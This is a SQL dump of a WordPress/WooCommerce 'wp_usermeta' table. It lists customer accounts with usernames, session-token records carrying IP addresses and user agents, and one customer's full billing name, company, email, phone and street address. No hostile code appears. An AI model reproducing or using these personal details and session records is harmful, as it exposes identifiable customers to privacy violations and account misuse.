INSERT INTO `wp_usermeta` VALUES (5568, 34, 'session_tokens', 'a:3:{s:64:"fac17a70da1b05e7f4be421fbca0d19e77ffeda7d50df34035f561a71d67860d";a:4:{s:10:"expiration";i:1503068502;s:2:"ip";s:12:"96.72.85.246";s:2:"ua";s:115:"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.101 Safari/537.36";s:5:"login";i:1502895702;}s:64:"9d34d97f6ac39ee38005a9caa15711fe073021504270eee24441a1babf5ea2a9";a:4:{s:10:"expiration";i:1503146143;s:2:"ip";s:12:"96.72.85.246";s:2:"ua";s:115:"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.101 Safari/537.36";s:5:"login";i:1502973343;}s:64:"4a90213e8c38d96729a8cb458c0c1ac2fb2cce75a09dd56c59b8d62d3dedaefb";a:4:{s:10:"expiration";i:1503232815;s:2:"ip";s:12:"96.72.85.246";s:2:"ua";s:115:"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.101 Safari/537.36";s:5:"login";i:1503060015;}}'); 
INSERT INTO `wp_usermeta` VALUES (5570, 319, 'nickname', 'rick.asher'); 
INSERT INTO `wp_usermeta` VALUES (5571, 319, 'first_name', ''); 
INSERT INTO `wp_usermeta` VALUES (5572, 319, 'last_name', ''); 
INSERT INTO `wp_usermeta` VALUES (5573, 319, 'description', ''); 
INSERT INTO `wp_usermeta` VALUES (5574, 319, 'rich_editing', 'true'); 
INSERT INTO `wp_usermeta` VALUES (5575, 319, 'comment_shortcuts', 'false'); 
INSERT INTO `wp_usermeta` VALUES (5576, 319, 'admin_color', 'fresh'); 
INSERT INTO `wp_usermeta` VALUES (5577, 319, 'use_ssl', '0'); 
INSERT INTO `wp_usermeta` VALUES (5578, 319, 'show_admin_bar_front', 'true'); 
INSERT INTO `wp_usermeta` VALUES (5579, 319, 'wp_capabilities', 'a:1:{s:8:"customer";b:1;}'); 
INSERT INTO `wp_usermeta` VALUES (5580, 319, 'wp_user_level', '0'); 
INSERT INTO `wp_usermeta` VALUES (5581, 319, '_yoast_wpseo_profile_updated', '1483725309'); 
INSERT INTO `wp_usermeta` VALUES (5582, 319, 'session_tokens', 'a:1:{s:64:"bbec7a46521c1b18b1bba0062fafad5734761df023ee240357044a11cc52f990";a:4:{s:10:"expiration";i:1484934910;s:2:"ip";s:11:"70.211.2.51";s:2:"ua";s:167:"Mozilla/5.0 (Linux; Android 5.0.1; SAMSUNG SCH-I545 4G Build/LRX22C) AppleWebKit/537.36 (KHTML, like Gecko) SamsungBrowser/2.1 Chrome/34.0.1847.76 Mobile Safari/537.36";s:5:"login";i:1483725310;}}'); 
INSERT INTO `wp_usermeta` VALUES (5583, 320, 'nickname', 'Mulumbia13'); 
INSERT INTO `wp_usermeta` VALUES (5584, 320, 'first_name', ''); 
INSERT INTO `wp_usermeta` VALUES (5585, 320, 'last_name', ''); 
INSERT INTO `wp_usermeta` VALUES (5586, 320, 'description', ''); 
INSERT INTO `wp_usermeta` VALUES (5587, 320, 'rich_editing', 'true'); 
INSERT INTO `wp_usermeta` VALUES (5588, 320, 'comment_shortcuts', 'false'); 
INSERT INTO `wp_usermeta` VALUES (5589, 320, 'admin_color', 'fresh'); 
INSERT INTO `wp_usermeta` VALUES (5590, 320, 'use_ssl', '0'); 
INSERT INTO `wp_usermeta` VALUES (5591, 320, 'show_admin_bar_front', 'true'); 
INSERT INTO `wp_usermeta` VALUES (5592, 320, 'wp_capabilities', 'a:1:{s:8:"customer";b:1;}'); 
INSERT INTO `wp_usermeta` VALUES (5593, 320, 'wp_user_level', '0'); 
INSERT INTO `wp_usermeta` VALUES (5594, 320, '_yoast_wpseo_profile_updated', '1483952748'); 
INSERT INTO `wp_usermeta` VALUES (5595, 320, 'session_tokens', 'a:1:{s:64:"58748aafda417971bab4f78c38c53286412545c7bebd45b7c6fa64ffa34df4ca";a:4:{s:10:"expiration";i:1485162349;s:2:"ip";s:15:"168.235.197.104";s:2:"ua";s:91:"UCWEB/2.0 (MIDP-2.0; U; Adr 4.4.2; en-US; Y3S) U2/1.0.0 UCBrowser/9.6.0.514 U2/1.0.0 Mobile";s:5:"login";i:1483952749;}}'); 
INSERT INTO `wp_usermeta` VALUES (5596, 320, 'manageedit-shop_ordercolumnshidden', 'a:1:{i:0;s:15:"billing_address";}'); 
INSERT INTO `wp_usermeta` VALUES (5597, 321, 'nickname', 'alex.ellwood'); 
INSERT INTO `wp_usermeta` VALUES (5598, 321, 'first_name', ''); 
INSERT INTO `wp_usermeta` VALUES (5599, 321, 'last_name', ''); 
INSERT INTO `wp_usermeta` VALUES (5600, 321, 'description', ''); 
INSERT INTO `wp_usermeta` VALUES (5601, 321, 'rich_editing', 'true'); 
INSERT INTO `wp_usermeta` VALUES (5602, 321, 'comment_shortcuts', 'false'); 
INSERT INTO `wp_usermeta` VALUES (5603, 321, 'admin_color', 'fresh'); 
INSERT INTO `wp_usermeta` VALUES (5604, 321, 'use_ssl', '0'); 
INSERT INTO `wp_usermeta` VALUES (5605, 321, 'show_admin_bar_front', 'true'); 
INSERT INTO `wp_usermeta` VALUES (5606, 321, 'wp_capabilities', 'a:1:{s:8:"customer";b:1;}'); 
INSERT INTO `wp_usermeta` VALUES (5607, 321, 'wp_user_level', '0'); 
INSERT INTO `wp_usermeta` VALUES (5608, 321, '_yoast_wpseo_profile_updated', '1483976756'); 
INSERT INTO `wp_usermeta` VALUES (5609, 321, 'session_tokens', 'a:1:{s:64:"559fe8570b586a9bd1af42e8334c99deb9a86161f0cbfff738352e348f9166d8";a:4:{s:10:"expiration";i:1485186357;s:2:"ip";s:14:"134.216.26.215";s:2:"ua";s:90:"Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; Gulfstream Aerospace; rv:11.0) like Gecko";s:5:"login";i:1483976757;}}'); 
INSERT INTO `wp_usermeta` VALUES (5610, 322, 'nickname', 'dmason'); 
INSERT INTO `wp_usermeta` VALUES (5611, 322, 'first_name', ''); 
INSERT INTO `wp_usermeta` VALUES (5612, 322, 'last_name', ''); 
INSERT INTO `wp_usermeta` VALUES (5613, 322, 'description', ''); 
INSERT INTO `wp_usermeta` VALUES (5614, 322, 'rich_editing', 'true'); 
INSERT INTO `wp_usermeta` VALUES (5615, 322, 'comment_shortcuts', 'false'); 
INSERT INTO `wp_usermeta` VALUES (5616, 322, 'admin_color', 'fresh'); 
INSERT INTO `wp_usermeta` VALUES (5617, 322, 'use_ssl', '0'); 
INSERT INTO `wp_usermeta` VALUES (5618, 322, 'show_admin_bar_front', 'true'); 
INSERT INTO `wp_usermeta` VALUES (5619, 322, 'wp_capabilities', 'a:1:{s:8:"customer";b:1;}'); 
INSERT INTO `wp_usermeta` VALUES (5620, 322, 'wp_user_level', '0'); 
INSERT INTO `wp_usermeta` VALUES (5621, 322, '_yoast_wpseo_profile_updated', '1483980966'); 
INSERT INTO `wp_usermeta` VALUES (5623, 322, 'manageedit-shop_ordercolumnshidden', 'a:1:{i:0;s:15:"billing_address";}'); 
INSERT INTO `wp_usermeta` VALUES (5624, 323, 'nickname', 'dane'); 
INSERT INTO `wp_usermeta` VALUES (5625, 323, 'first_name', ''); 
INSERT INTO `wp_usermeta` VALUES (5626, 323, 'last_name', ''); 
INSERT INTO `wp_usermeta` VALUES (5627, 323, 'description', ''); 
INSERT INTO `wp_usermeta` VALUES (5628, 323, 'rich_editing', 'true'); 
INSERT INTO `wp_usermeta` VALUES (5629, 323, 'comment_shortcuts', 'false'); 
INSERT INTO `wp_usermeta` VALUES (5630, 323, 'admin_color', 'fresh'); 
INSERT INTO `wp_usermeta` VALUES (5631, 323, 'use_ssl', '0'); 
INSERT INTO `wp_usermeta` VALUES (5632, 323, 'show_admin_bar_front', 'true'); 
INSERT INTO `wp_usermeta` VALUES (5633, 323, 'wp_capabilities', 'a:1:{s:8:"customer";b:1;}'); 
INSERT INTO `wp_usermeta` VALUES (5634, 323, 'wp_user_level', '0'); 
INSERT INTO `wp_usermeta` VALUES (5635, 323, '_yoast_wpseo_profile_updated', '1483987324'); 
INSERT INTO `wp_usermeta` VALUES (5637, 323, 'session_tokens', 'a:1:{s:64:"4eb900d980138a9451bb7ad173c30f9a4dc2206996fa317127ec1d8fbb53a3e0";a:4:{s:10:"expiration";i:1484160223;s:2:"ip";s:15:"122.166.204.166";s:2:"ua";s:72:"Mozilla/5.0 (Windows NT 6.1; WOW64; rv:50.0) Gecko/20100101 Firefox/50.0";s:5:"login";i:1483987423;}}'); 
INSERT INTO `wp_usermeta` VALUES (5638, 323, 'manageedit-shop_ordercolumnshidden', 'a:1:{i:0;s:15:"billing_address";}'); 
INSERT INTO `wp_usermeta` VALUES (5639, 324, 'nickname', 'juliademasellis'); 
INSERT INTO `wp_usermeta` VALUES (5640, 324, 'first_name', ''); 
INSERT INTO `wp_usermeta` VALUES (5641, 324, 'last_name', ''); 
INSERT INTO `wp_usermeta` VALUES (5642, 324, 'description', ''); 
INSERT INTO `wp_usermeta` VALUES (5643, 324, 'rich_editing', 'true'); 
INSERT INTO `wp_usermeta` VALUES (5644, 324, 'comment_shortcuts', 'false'); 
INSERT INTO `wp_usermeta` VALUES (5645, 324, 'admin_color', 'fresh'); 
INSERT INTO `wp_usermeta` VALUES (5646, 324, 'use_ssl', '0'); 
INSERT INTO `wp_usermeta` VALUES (5647, 324, 'show_admin_bar_front', 'true'); 
INSERT INTO `wp_usermeta` VALUES (5648, 324, 'wp_capabilities', 'a:1:{s:8:"customer";b:1;}'); 
INSERT INTO `wp_usermeta` VALUES (5649, 324, 'wp_user_level', '0'); 
INSERT INTO `wp_usermeta` VALUES (5650, 324, '_yoast_wpseo_profile_updated', '1483988932'); 
INSERT INTO `wp_usermeta` VALUES (5651, 324, 'session_tokens', 'a:1:{s:64:"53d7b33a02a34c9e8251939ff8592a13facdac84026babf0850dfe2397f0a4eb";a:4:{s:10:"expiration";i:1485198532;s:2:"ip";s:14:"192.104.67.121";s:2:"ua";s:68:"Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko";s:5:"login";i:1483988932;}}'); 
INSERT INTO `wp_usermeta` VALUES (5652, 325, 'nickname', 'eheinze'); 
INSERT INTO `wp_usermeta` VALUES (5653, 325, 'first_name', ''); 
INSERT INTO `wp_usermeta` VALUES (5654, 325, 'last_name', ''); 
INSERT INTO `wp_usermeta` VALUES (5655, 325, 'description', ''); 
INSERT INTO `wp_usermeta` VALUES (5656, 325, 'rich_editing', 'true'); 
INSERT INTO `wp_usermeta` VALUES (5657, 325, 'comment_shortcuts', 'false'); 
INSERT INTO `wp_usermeta` VALUES (5658, 325, 'admin_color', 'fresh'); 
INSERT INTO `wp_usermeta` VALUES (5659, 325, 'use_ssl', '0'); 
INSERT INTO `wp_usermeta` VALUES (5660, 325, 'show_admin_bar_front', 'true'); 
INSERT INTO `wp_usermeta` VALUES (5661, 325, 'wp_capabilities', 'a:1:{s:8:"customer";b:1;}'); 
INSERT INTO `wp_usermeta` VALUES (5662, 325, 'wp_user_level', '0'); 
INSERT INTO `wp_usermeta` VALUES (5663, 325, '_yoast_wpseo_profile_updated', '1484002306'); 
INSERT INTO `wp_usermeta` VALUES (5664, 325, 'session_tokens', 'a:1:{s:64:"30045903164b302f116cc32440de6a02b10f0424eef3c935422490889fe7acd8";a:4:{s:10:"expiration";i:1485211907;s:2:"ip";s:12:"74.87.133.66";s:2:"ua";s:68:"Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko";s:5:"login";i:1484002307;}}'); 
INSERT INTO `wp_usermeta` VALUES (5665, 25, 'manageedit-shop_ordercolumnshidden', 'a:1:{i:0;s:15:"billing_address";}'); 
INSERT INTO `wp_usermeta` VALUES (5666, 326, 'nickname', 'gdawson'); 
INSERT INTO `wp_usermeta` VALUES (5667, 326, 'first_name', ''); 
INSERT INTO `wp_usermeta` VALUES (5668, 326, 'last_name', ''); 
INSERT INTO `wp_usermeta` VALUES (5669, 326, 'description', ''); 
INSERT INTO `wp_usermeta` VALUES (5670, 326, 'rich_editing', 'true'); 
INSERT INTO `wp_usermeta` VALUES (5671, 326, 'comment_shortcuts', 'false'); 
INSERT INTO `wp_usermeta` VALUES (5672, 326, 'admin_color', 'fresh'); 
INSERT INTO `wp_usermeta` VALUES (5673, 326, 'use_ssl', '0'); 
INSERT INTO `wp_usermeta` VALUES (5674, 326, 'show_admin_bar_front', 'true'); 
INSERT INTO `wp_usermeta` VALUES (5675, 326, 'wp_capabilities', 'a:1:{s:8:"customer";b:1;}'); 
INSERT INTO `wp_usermeta` VALUES (5676, 326, 'wp_user_level', '0'); 
INSERT INTO `wp_usermeta` VALUES (5677, 326, '_yoast_wpseo_profile_updated', '1484021043'); 
INSERT INTO `wp_usermeta` VALUES (5678, 326, 'session_tokens', 'a:1:{s:64:"6c38029d5a2f6cb29cdd4624ab1a34830f9f1a2f2d9a71c4dcb97d7428ebc5b2";a:4:{s:10:"expiration";i:1501212603;s:2:"ip";s:15:"103.232.232.132";s:2:"ua";s:102:"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/59.0.3071.115 Safari/537.36";s:5:"login";i:1501039803;}}'); 
INSERT INTO `wp_usermeta` VALUES (5679, 326, 'billing_first_name', 'Gary'); 
INSERT INTO `wp_usermeta` VALUES (5680, 326, 'billing_last_name', 'Dawson'); 
INSERT INTO `wp_usermeta` VALUES (5681, 326, 'billing_company', 'MSDSonline'); 
INSERT INTO `wp_usermeta` VALUES (5682, 326, 'billing_email', 'gdawson@ehs.com'); 
INSERT INTO `wp_usermeta` VALUES (5683, 326, 'billing_phone', '3025979182'); 
INSERT INTO `wp_usermeta` VALUES (5684, 326, 'billing_country', 'US'); 
INSERT INTO `wp_usermeta` VALUES (5685, 326, 'billing_address_1', '350 North Orleans Street, Suite 950'); 
INSERT INTO `wp_usermeta` VALUES (5686, 326, 'billing_address_2', ''); 
INSERT INTO `wp_usermeta` VALUES (5687, 326, 'billing_city', 'Chicago'); 
INSERT INTO `wp_usermeta` VALUES (5688, 326, 'billing_state', 'IL'); 
INSERT INTO `wp_usermeta` VALUES (5689, 326, 'billing_postcode', '60654'); 
INSERT INTO `wp_usermeta` VALUES (5690, 327, 'nickname', 'KArmugam'); 
INSERT INTO `wp_usermeta` VALUES (5691, 327, 'first_name', ''); 
INSERT INTO `wp_usermeta` VALUES (5692, 327, 'last_name', ''); 
INSERT INTO `wp_usermeta` VALUES (5693, 327, 'description', ''); 
INSERT INTO `wp_usermeta` VALUES (5694, 327, 'rich_editing', 'true'); 
INSERT INTO `wp_usermeta` VALUES (5695, 327, 'comment_shortcuts', 'false'); 
INSERT INTO `wp_usermeta` VALUES (5696, 327, 'admin_color', 'fresh'); 
INSERT INTO `wp_usermeta` VALUES (5697, 327, 'use_ssl', '0'); 
INSERT INTO `wp_usermeta` VALUES (5698, 327, 'show_admin_bar_front', 'true'); 
INSERT INTO `wp_usermeta` VALUES (5699, 327, 'wp_capabilities', 'a:1:{s:8:"customer";b:1;}'); 
INSERT INTO `wp_usermeta` VALUES (5700, 327, 'wp_user_level', '0'); 
INSERT INTO `wp_usermeta` VALUES (5701, 327, '_yoast_wpseo_profile_updated', '1484027900'); 
INSERT INTO `wp_usermeta` VALUES (5702, 327, 'session_tokens', 'a:1:{s:64:"37d271db82859d34a5b2bce0a797efeb7e6417f97c45a3a647c861885d8b1e30";a:4:{s:10:"expiration";i:1485237501;s:2:"ip";s:12:"219.65.67.26";s:2:"ua";s:108:"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.87 Safari/537.36";s:5:"login";i:1484027901;}}'); 
INSERT INTO `wp_usermeta` VALUES (5703, 328, 'nickname', 'ntetrault'); 
INSERT INTO `wp_usermeta` VALUES (5704, 328, 'first_name', ''); 
INSERT INTO `wp_usermeta` VALUES (5705, 328, 'last_name', ''); 
INSERT INTO `wp_usermeta` VALUES (5706, 328, 'description', ''); 
INSERT INTO `wp_usermeta` VALUES (5707, 328, 'rich_editing', 'true'); 
INSERT INTO `wp_usermeta` VALUES (5708, 328, 'comment_shortcuts', 'false'); 
INSERT INTO `wp_usermeta` VALUES (5709, 328, 'admin_color', 'fresh'); 
INSERT INTO `wp_usermeta` VALUES (5710, 328, 'use_ssl', '0'); 
INSERT INTO `wp_usermeta` VALUES (5711, 328, 'show_admin_bar_front', 'true'); 
INSERT INTO `wp_usermeta` VALUES (5712, 328, 'wp_capabilities', 'a:1:{s:8:"customer";b:1;}'); 
INSERT INTO `wp_usermeta` VALUES (5713, 328, 'wp_user_level', '0'); 
INSERT INTO `wp_usermeta` VALUES (5714, 328, '_yoast_wpseo_profile_updated', '1484053977'); 
INSERT INTO `wp_usermeta` VALUES (5715, 328, 'session_tokens', 'a:1:{s:64:"fb18ca84db9e3d2ca065048aa2416991f28d09faf885cafd6dc463a3149f80af";a:4:{s:10:"expiration";i:1485263578;s:2:"ip";s:12:"71.41.94.131";s:2:"ua";s:108:"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.87 Safari/537.36";s:5:"login";i:1484053978;}}'); 
INSERT INTO `wp_usermeta` VALUES (5716, 329, 'nickname', 'zaclewis83'); 
INSERT INTO `wp_usermeta` VALUES (5717, 329, 'first_name', ''); 
INSERT INTO `wp_usermeta` VALUES (5718, 329, 'last_name', ''); 
INSERT INTO `wp_usermeta` VALUES (5719, 329, 'description', ''); 
INSERT INTO `wp_usermeta` VALUES (5720, 329, 'rich_editing', 'true'); 
INSERT INTO `wp_usermeta` VALUES (5721, 329, 'comment_shortcuts', 'false'); 
INSERT INTO `wp_usermeta` VALUES (5722, 329, 'admin_color', 'fresh'); 
INSERT INTO `wp_usermeta` VALUES (5723, 329, 'use_ssl', '0'); 
INSERT INTO `wp_usermeta` VALUES (5724, 329, 'show_admin_bar_front', 'true'); 
INSERT INTO `wp_usermeta` VALUES (5725, 329, 'wp_capabilities', 'a:1:{s:8:"customer";b:1;}'); 
INSERT INTO `wp_usermeta` VALUES (5726, 329, 'wp_user_level', '0'); 
INSERT INTO `wp_usermeta` VALUES (5727, 329, '_yoast_wpseo_profile_updated', '1484054654'); 
INSERT INTO `wp_usermeta` VALUES (5728, 329, 'session_tokens', 'a:1:{s:64:"05a47cdb50ec4baa493bf8d439d9cedf90a42bbfd0e99124b48126b010cf4d98";a:4:{s:10:"expiration";i:1485264255;s:2:"ip";s:11:"132.3.49.81";s:2:"ua";s:73:"Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko";s:5:"login";i:1484054655;}}'); 
INSERT INTO `wp_usermeta` VALUES (5729, 329, 'manageedit-shop_ordercolumnshidden', 'a:1:{i:0;s:15:"billing_address";}'); 
INSERT INTO `wp_usermeta` VALUES (5730, 330, 'nickname', 'eric.c.marcy.civ'); 
INSERT INTO `wp_usermeta` VALUES (5731, 330, 'first_name', ''); 
INSERT INTO `wp_usermeta` VALUES (5732, 330, 'last_name', ''); 
INSERT INTO `wp_usermeta` VALUES (5733, 330, 'description', ''); 
INSERT INTO `wp_usermeta` VALUES (5734, 330, 'rich_editing', 'true'); 
INSERT INTO `wp_usermeta` VALUES (5735, 330, 'comment_shortcuts', 'false'); 
INSERT INTO `wp_usermeta` VALUES (5736, 330, 'admin_color', 'fresh'); 
INSERT INTO `wp_usermeta` VALUES (5737, 330, 'use_ssl', '0'); 
INSERT INTO `wp_usermeta` VALUES (5738, 330, 'show_admin_bar_front', 'true'); 
INSERT INTO `wp_usermeta` VALUES (5739, 330, 'wp_capabilities', 'a:1:{s:8:"customer";b:1;}'); 
INSERT INTO `wp_usermeta` VALUES (5740, 330, 'wp_user_level', '0'); 
INSERT INTO `wp_usermeta` VALUES (5741, 330, '_yoast_wpseo_profile_updated', '1484064703'); 
INSERT INTO `wp_usermeta` VALUES (5742, 330, 'session_tokens', 'a:1:{s:64:"280532decbc356b5d6c160c31874df39a1a9416fc108f0eccc09bd9dc94a2b21";a:4:{s:10:"expiration";i:1485274304;s:2:"ip";s:14:"155.218.179.74";s:2:"ua";s:73:"Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko";s:5:"login";i:1484064704;}}'); 
INSERT INTO `wp_usermeta` VALUES (5743, 331, 'nickname', 'lawrence.dubois.1.ctr'); 
INSERT INTO `wp_usermeta` VALUES (5744, 331, 'first_name', ''); 
INSERT INTO `wp_usermeta` VALUES (5745, 331, 'last_name', ''); 
INSERT INTO `wp_usermeta` VALUES (5746, 331, 'description', ''); 
INSERT INTO `wp_usermeta` VALUES (5747, 331, 'rich_editing', 'true'); 
INSERT INTO `wp_usermeta` VALUES (5748, 331, 'comment_shortcuts', 'false'); 
INSERT INTO `wp_usermeta` VALUES (5749, 331, 'admin_color', 'fresh'); 
INSERT INTO `wp_usermeta` VALUES (5750, 331, 'use_ssl', '0'); 
INSERT INTO `wp_usermeta` VALUES (5751, 331, 'show_admin_bar_front', 'true'); 
INSERT INTO `wp_usermeta` VALUES (5752, 331, 'wp_capabilities', 'a:1:{s:8:"customer";b:1;}'); 
INSERT INTO `wp_usermeta` VALUES (5753, 331, 'wp_user_level', '0'); 
INSERT INTO `wp_usermeta` VALUES (5754, 331, '_yoast_wpseo_profile_updated', '1484068963'); 
INSERT INTO `wp_usermeta` VALUES (5755, 331, 'session_tokens', 'a:1:{s:64:"2d794e5acc6ee4c1272de386b140c756cd6d3b32811c0367b1947b85a20db35e";a:4:{s:10:"expiration";i:1485278564;s:2:"ip";s:11:"132.3.53.80";s:2:"ua";s:73:"Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko";s:5:"login";i:1484068964;}}'); 
INSERT INTO `wp_usermeta` VALUES (5756, 332, 'nickname', 'Than'); 
INSERT INTO `wp_usermeta` VALUES (5757, 332, 'first_name', ''); 
INSERT INTO `wp_usermeta` VALUES (5758, 332, 'last_name', ''); 
INSERT INTO `wp_usermeta` VALUES (5759, 332, 'description', ''); 
INSERT INTO `wp_usermeta` VALUES (5760, 332, 'rich_editing', 'true'); 
INSERT INTO `wp_usermeta` VALUES (5761, 332, 'comment_shortcuts', 'false'); 
INSERT INTO `wp_usermeta` VALUES (5762, 332, 'admin_color', 'fresh'); 
INSERT INTO `wp_usermeta` VALUES (5763, 332, 'use_ssl', '0'); 
INSERT INTO `wp_usermeta` VALUES (5764, 332, 'show_admin_bar_front', 'true'); 
INSERT INTO `wp_usermeta` VALUES (5765, 332, 'wp_capabilities', 'a:1:{s:8:"customer";b:1;}'); 
INSERT INTO `wp_usermeta` VALUES (5766, 332, 'wp_user_level', '0'); 
INSERT INTO `wp_usermeta` VALUES (5767, 332, '_yoast_wpseo_profile_updated', '1484072597'); 
INSERT INTO `wp_usermeta` VALUES (5768, 332, 'session_tokens', 'a:1:{s:64:"b681ed709b1a9b1b1c011cdbfb6f534b4dffa455a8809052b70dbec78b5b4397";a:4:{s:10:"expiration";i:1485282198;s:2:"ip";s:12:"136.237.9.10";s:2:"ua";s:113:"Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.87 Safari/537.36";s:5:"login";i:1484072598;}}'); 
INSERT INTO `wp_usermeta` VALUES (5769, 333, 'nickname', 'cescindyf'); 
INSERT INTO `wp_usermeta` VALUES (5770, 333, 'first_name', ''); 
INSERT INTO `wp_usermeta` VALUES (5771, 333, 'last_name', ''); 
INSERT INTO `wp_usermeta` VALUES (5772, 333, 'description', ''); 
INSERT INTO `wp_usermeta` VALUES (5773, 333, 'rich_editing', 'true'); 
INSERT INTO `wp_usermeta` VALUES (5774, 333, 'comment_shortcuts', 'false'); 
INSERT INTO `wp_usermeta` VALUES (5775, 333, 'admin_color', 'fresh'); 
INSERT INTO `wp_usermeta` VALUES (5776, 333, 'use_ssl', '0'); 
INSERT INTO `wp_usermeta` VALUES (5777, 333, 'show_admin_bar_front', 'true'); 
INSERT INTO `wp_usermeta` VALUES (5778, 333, 'wp_capabilities', 'a:1:{s:8:"customer";b:1;}'); 
INSERT INTO `wp_usermeta` VALUES (5779, 333, 'wp_user_level', '0'); 
INSERT INTO `wp_usermeta` VALUES (5780, 333, '_yoast_wpseo_profile_updated', '1484072778'); 
INSERT INTO `wp_usermeta` VALUES (5781, 333, 'session_tokens', 'a:1:{s:64:"822ee4dafef061de64ba0a4619f55d4201c761d9db603d49ffdfeb0b12a5041e";a:4:{s:10:"expiration";i:1487962423;s:2:"ip";s:13:"67.174.112.44";s:2:"ua";s:73:"Mozilla/5.0 (Windows NT 10.0; WOW64; rv:51.0) Gecko/20100101 Firefox/51.0";s:5:"login";i:1487789623;}}'); 
INSERT INTO `wp_usermeta` VALUES (5782, 332, 'manageedit-shop_ordercolumnshidden', 'a:1:{i:0;s:15:"billing_address";}'); 
INSERT INTO `wp_usermeta` VALUES (5783, 334, 'nickname', 'slaw'); 
INSERT INTO `wp_usermeta` VALUES (5784, 334, 'first_name', ''); 
INSERT INTO `wp_usermeta` VALUES (5785, 334, 'last_name', ''); 
INSERT INTO `wp_usermeta` VALUES (5786, 334, 'description', ''); 
INSERT INTO `wp_usermeta` VALUES (5787, 334, 'rich_editing', 'true'); 
INSERT INTO `wp_usermeta` VALUES (5788, 334, 'comment_shortcuts', 'false'); 
INSERT INTO `wp_usermeta` VALUES (5789, 334, 'admin_color', 'fresh'); 
INSERT INTO `wp_usermeta` VALUES (5790, 334, 'use_ssl', '0'); 
INSERT INTO `wp_usermeta` VALUES (5791, 334, 'show_admin_bar_front', 'true'); 
INSERT INTO `wp_usermeta` VALUES (5792, 334, 'wp_capabilities', 'a:1:{s:8:"customer";b:1;}'); 
INSERT INTO `wp_usermeta` VALUES (5793, 334, 'wp_user_level', '0'); 
INSERT INTO `wp_usermeta` VALUES (5794, 334, '_yoast_wpseo_profile_updated', '1484076559'); 
INSERT INTO `wp_usermeta` VALUES (5795, 334, 'session_tokens', 'a:1:{s:64:"2c7aef0e304a953d9d892f4a8b8255e77625b8cb3348d013590cc2746c510b28";a:4:{s:10:"expiration";i:1485286161;s:2:"ip";s:11:"69.37.242.2";s:2:"ua";s:68:"Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko";s:5:"login";i:1484076561;}}'); 
INSERT INTO `wp_usermeta` VALUES (5796, 335, 'nickname', 'kc855413'); 
INSERT INTO `wp_usermeta` VALUES (5797, 335, 'first_name', ''); 
INSERT INTO `wp_usermeta` VALUES (5798, 335, 'last_name', ''); 
INSERT INTO `wp_usermeta` VALUES (5799, 335, 'description', ''); 
INSERT INTO `wp_usermeta` VALUES (5800, 335, 'rich_editing', 'true'); 
INSERT INTO `wp_usermeta` VALUES (5801, 335, 'comment_shortcuts', 'false'); 
INSERT INTO `wp_usermeta` VALUES (5802, 335, 'admin_color', 'fresh'); 
INSERT INTO `wp_usermeta` VALUES (5803, 335, 'use_ssl', '0'); 
INSERT INTO `wp_usermeta` VALUES (5804, 335, 'show_admin_bar_front', 'true'); 
INSERT INTO `wp_usermeta` VALUES (5805, 335, 'wp_capabilities', 'a:1:{s:8:"customer";b:1;}'); 
INSERT INTO `wp_usermeta` VALUES (5806, 335, 'wp_user_level', '0'); 
INSERT INTO `wp_usermeta` VALUES (5807, 335, '_yoast_wpseo_profile_updated', '1484076936'); 
INSERT INTO `wp_usermeta` VALUES (5808, 335, 'session_tokens', 'a:1:{s:64:"28eb90a598002e5093775fd5fd50c982331af498ddcedf54d3048ce651be7bc4";a:4:{s:10:"expiration";i:1485286537;s:2:"ip";s:14:"132.235.18.111";s:2:"ua";s:104:"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.75 Safari/537.36";s:5:"login";i:1484076937;}}'); 
INSERT INTO `wp_usermeta` VALUES (5809, 336, 'nickname', 'swhittingham'); 
INSERT INTO `wp_usermeta` VALUES (5810, 336, 'first_name', ''); 
INSERT INTO `wp_usermeta` VALUES (5811, 336, 'last_name', ''); 
INSERT INTO `wp_usermeta` VALUES (5812, 336, 'description', ''); 
INSERT INTO `wp_usermeta` VALUES (5813, 336, 'rich_editing', 'true'); 
INSERT INTO `wp_usermeta` VALUES (5814, 336, 'comment_shortcuts', 'false'); 
INSERT INTO `wp_usermeta` VALUES (5815, 336, 'admin_color', 'fresh'); 
INSERT INTO `wp_usermeta` VALUES (5816, 336, 'use_ssl', '0'); 
INSERT INTO `wp_usermeta` VALUES (5817, 336, 'show_admin_bar_front', 'true'); 
INSERT INTO `wp_usermeta` VALUES (5818, 336, 'wp_capabilities', 'a:1:{s:8:"customer";b:1;}'); 
INSERT INTO `wp_usermeta` VALUES (5819, 336, 'wp_user_level', '0'); 
INSERT INTO `wp_usermeta` VALUES (5820, 336, '_yoast_wpseo_profile_updated', '1484171571'); 
